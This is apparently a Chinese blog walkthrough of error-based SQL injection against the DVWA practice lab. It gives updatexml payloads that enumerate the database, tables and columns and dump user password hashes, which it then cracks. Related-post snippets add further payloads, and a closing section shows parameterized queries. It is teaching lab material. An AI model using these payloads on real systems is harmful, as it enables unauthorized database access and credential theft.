SQL注入之报错注入

最新推荐文章于 2024-08-27 13:56:09 发布
最新推荐文章于 2024-08-27 13:56:09 发布
阅读量901 收藏 9
点赞数 9
文章标签: sql mybatis mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63156954/article/details/140542771
版权

以DVWA靶场为例:

一、测试注入点既类型:

输入'

        存在注入点且为符号型单引号闭合型

二、获取数据库名:

输入'and (updatexml(1,concat(0x7e,(select database()),0x7e),1))='1

数据库名为dvwa

三、获取数据库表名:

输入'and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),0x7e),1))='1

        数据库dvwa中有两个表,分别叫guestbook,users

        猜测登录账号密码在users里

四、获取users里的字段名

输入'and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'),0x7e),1))='1

        为什么会出现显示不全的情况呢?(右边的~未显示)

        因为报错显示位有限(32位),据猜测字段语义我们可以排除已经显示的几个字段里不存在我们需要的账户与密码,所以接下来我们用substring()函数查看后面的字段名

输入'and (updatexml(1,concat(0x7e,(select substring(group_concat(column_name),25,30) from information_schema.columns where table_name='users' and table_schema='dvwa'),0x7e),1))='1

        显然我们要的账号与密码分别在user与password字段中

五、获取user与password字段具体的值

        同样我们获取具体值的时候也要注意报错显示只有32位,这里我们用limit()函数限制每次读取一对账号密码(limit 0,1表示只查询1条数据,索引从0开始,第1条记录,依次修改索引,将全部数据读出)

读取第一对账号密码:

输入'and (updatexml(1,concat(0x7e,(select concat('~',user,'~',password,'~') from users limit 0,1),0x7e),1))='1

        这里明显显示不全,为了将密码全部一次读出,多次构造注入尝试,发现无法一次读出完整密码,只能分两次读出并拼接,多次尝试发现substring(32,35)刚好可以读出剩余密码以便拼接。

输入'and (updatexml(1,concat(0x7e,(select substring(concat('~',user,'~',password,'~'),32,35) from users limit 0,1),0x7e),1))='1

账号为:admin

密码拼接后:431a90268fe4538ec36e1bb6307418dc

发现md5解密失败!估计是测试账号

        依次更改limit()函数的参数,从limit 0,1-->limt 1,1-->...-->limit 4,1-->...一直到无响应为止,将剩余账号密码读出并解密

账号2:

账号:gordonb

密码拼接后:e99a18c428cb38d5f260853678922e03

解密后:abc123

账号3:

账号:1337

密码拼接后:8d3533d75ae2c3966d7e0d4fcc69216b

解密后:charley

账号4:

账号:pablo

密码拼接后:0d107d09f5bbe40cade3de5c71e9e9b7

解密后:letmein

账号5:

账号:smithy

密码拼接后:5f4dcc3b5aa765d61d8327deb882cf99

解密后:password

输入'and (updatexml(1,concat(0x7e,(select concat('~',user,'~',password,'~') from users limit 5,1),0x7e),1))='1

        无响应,故可判断数据库内只存放了五对账号密码

        我们还可以通过联合查询注入(见我的博文《SQL注入基础篇》)验证我们查询的真伪:

输入1' union select user,password from users#

        可以看到和我们报错注入的结果一致。

DVWAsql注入——联合注入报错注入
Williamanddog的博客
12-20 2418
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWA系列---基于报错SQL注入SQL Injection)
野原新之助
02-06 1335
文章目录1、Low2、Medium3、High
Dvwa sql low 联合注入报错注入
m0_73581247的博客
06-03 434
rand 值)如果此时临时表只有 key 为 1 的行不存在 key 为 0 的行,那么数据库要将该条记录插入临。时表,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为 1,就。如果 key 存在于临时表中,则更新临时表中的数据(更新数据时,不再计算 rand 值);实际测试中发现,出现报错,至少要求数据记录为 3 行,记录数超过 3 行一定会报错,2 行。输入1,数据正常显示,输入1’,页面显示爆错,1附近多出现了一个逗号。Id=1 and 1=2 页面无显示。
dvwa进行报错注入
m0_65150886的博客
08-29 268
table_schema='dvwa' 查询库名为dwa,table_name='users'查询表名为users,information_schema.columns 内置列,column_name列名,count(column_name)计算查询到的列数。1' and extractvalue(1,concat(0x7e,database()))# 可以看到有一个dvwa表。可以通过修改url中的值来修改查询的表,limit后面的+表示空格,1表示从哪个位置开始查询。首先将包发送给测试器。
Web安全 学习日记5 - SQL盲注 和 报错注入 (DVWA)
qq_46081990的博客
03-11 678
SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,需要使用一些特殊的方式来判断,这个过程成为盲注。
SQL注入-报错注入
qq_65240014的博客
08-08 934
本文主要介绍一种结合burpsuite的报错注入sql注入方法
sql注入报错注入
m0_63436163的博客
08-27 1370
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL 注入报错注入、延时注入、布尔盲注
2301_77160226的博客
08-27 1543
SQL 注入攻击中,报错注入、延时注入和布尔盲注是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
DVWA[SQL-Injection]报错注入学习记录
nareku的博客
07-06 581
还是以sql-injection为例爆个库:输入查询语句: 得到数据库库名为dvwa爆个表名: 接下来还是爆users表里面的user和password字段。在使用updatexml()这个函数的时候有需要注意的地方,具体参考:传送门输入查询语句: 因为updatexml只支持32位的报错,因此最好一行一行地使用 concat limit 与substr 逐个爆破,调一下参数就行联合一下前面的,就可以得到user和password...
SQL注入入门学习笔记:DVWA-SQL注入报错注入
2301_78774803的博客
10-11 384
结果为:XPATH syntax error: '~admin,gordonb,1337,pablo,smithy',最后的“~”没有出现,所以需要继续查询。1' and updatexml(1,'database()~',3)#的结果为:XPATH syntax error: '()~'结果为:XPATH syntax error: '~9~',最后一个“~”出现,说明已经显示完。结果为:XPATH syntax error: '~~',最后一个“~”出现,说明已经显示完。
sql注入报错注入
2401_82760239的博客
04-02 1890
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入——报错注入
qq_41554179的博客
03-12 618
报错sql注入 报错sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。 语句: - AND(SELECT 1 FROM (SELECT COUNT(*...
【无标题】DVWA sql注入 报错问题
weixin_50339521的博客
08-25 922
dvwasql注入报错问题
DVWA sql注入-LOW
m0_46616663的博客
05-23 663
1.判断是否存在sql注入漏洞 出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。 如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。 2.判断注入漏洞的类型 分为两种: 数字型和字符型。 这是数据库本身存储数据时赋予给数据的类型。 先判断是否为数字型: 输入1 and 1 = 1 页面运行正常 输入1 and 1 = 2 页面也运行正常 分析: 如果查询语句为数字型的话...
网络安全——DVWASQL注入漏洞
猿的一天
01-10 2661
网络安全——DVWASQL注入漏洞
《WEB安全渗透测试》(3)SQL注入实战:报错注入
午夜安全
10-02 1057
《WEB安全渗透测试》(3)SQL注入实战:报错注入 1)考虑使用报错注入URL:http://www.tianchi.com/web/error.php?username=1URL:http://www.tianchi.com/web/error.php?username=1'由于多了一个',SQL语句执行时会报错。而这里程序直接将错误信息输出到了页面上,所以可以利用报错注入来获取数据。2)获取user()的值报错注入有多种格式,这里使用updatexml()函数,......
报错注入
j7ur8
06-22 2094
长期更新报错注入的知识,把代码审计这本书上的10种报错姿势吃透。这是一个神奇的登陆界面-floor()报错注入这道题目....给了我新的姿势把, 第一次真正研究报错注入。题目测试很容易 输入"会报错然后就是进行报错注入,测试了一番,没有过滤。然后进行floor()的报错注入1. 开始的姿势:1" and (select 1 from (select count(*), concat(floor(r...
DVWA进行SQL注入
Jo_kong的博客
10-02 4833
我用的是在VMware下的虚拟机,在这就不说安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到各大软件的官网上去下载)我用的系统如下: kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用...
sql注入出现报错信息
最新发布
03-17
### SQL注入报错的原因分析与解决方案 #### 一、SQL注入报错原因 SQL注入过程中出现的报错通常是因为输入的数据破坏了原始SQL语句的语法结构,或者触发了数据库的安全机制。以下是常见的几种报错场景及其成因: 1. **语法错误** 当攻击者尝试通过拼接恶意字符串来修改SQL查询逻辑时,可能会导致SQL语句无法正常解析而引发语法错误。例如,在`sqli-labs`的第一关中,如果仅闭合单引号而不处理后续部分,则可能导致前端页面显示类似“syntax error”的提示[^2]。 2. **权限不足** 数据库操作可能涉及特定用户的访问控制策略。当执行某些敏感命令(如读取文件或调用系统函数)时,若当前账户缺乏相应权限,也会抛出异常信息。 3. **防御措施生效** 现代Web应用往往配备多种防护手段对抗SQL注入威胁,比如WAF(Web Application Firewall),它能够识别并拦截可疑请求;另外还有参数化查询等编程层面的最佳实践可以有效规避此类漏洞的发生。 4. **数据类型冲突** 如果注入点预期接收整数型参数却收到字符型输入,那么转换失败同样会造成运行期崩溃现象。 #### 二、解决SQL注入报错的方法 针对上述提到的各种情形,下面列举了一些通用的技术应对办法: 1. **调整测试载荷(Payload)** 对于简单的语法问题,可以通过精心设计payload使得最终形成的完整query既满足业务需求又能绕过初步筛查。举个例子来说就是采用编码技术隐藏特殊符号的真实含义直到被目标引擎解读为止。 2. **利用条件判断代替直接输出** 考虑到有些场合不允许看到确切的error message,此时可改用布尔盲注法或者其他间接方式获取所需情报而不是依赖显式的fault report. 3. **借助工具自动化探索过程** 使用像SQLMap这样的开源软件可以帮助快速定位潜在风险区域以及自动适应不同的环境配置从而减少手动调试的工作量。假如遇到Windows平台上关于SQLMap本身的setup难题的话,按照官方文档指示逐步排查直至成功部署也是必要的步骤之一[^3]. 4. **增强应用程序安全性建议** - 实施严格的输入验证流程确保所有外部传入的数据都经过适当过滤后再参与内部运算。 - 推荐始终优先选用预编译语句而非动态组装string形式的commands. - 定期审查源码查找任何可能成为突破口的位置加以修正完善。 ```python import pymysql.cursors connection = pymysql.connect(host='localhost', user='user', password='passwd', database='db', cursorclass=pymysql.cursors.DictCursor) try: with connection.cursor() as cursor: sql = "SELECT * FROM users WHERE username=%s AND password=MD5(%s)" cursor.execute(sql, ('admin', 'password')) # 参数绑定防止SQL Injection finally: connection.close() ``` 以上代码片段展示了如何安全地构建SQL查询以防范传统意义上的injection attack。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zhanduanwanfeng

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值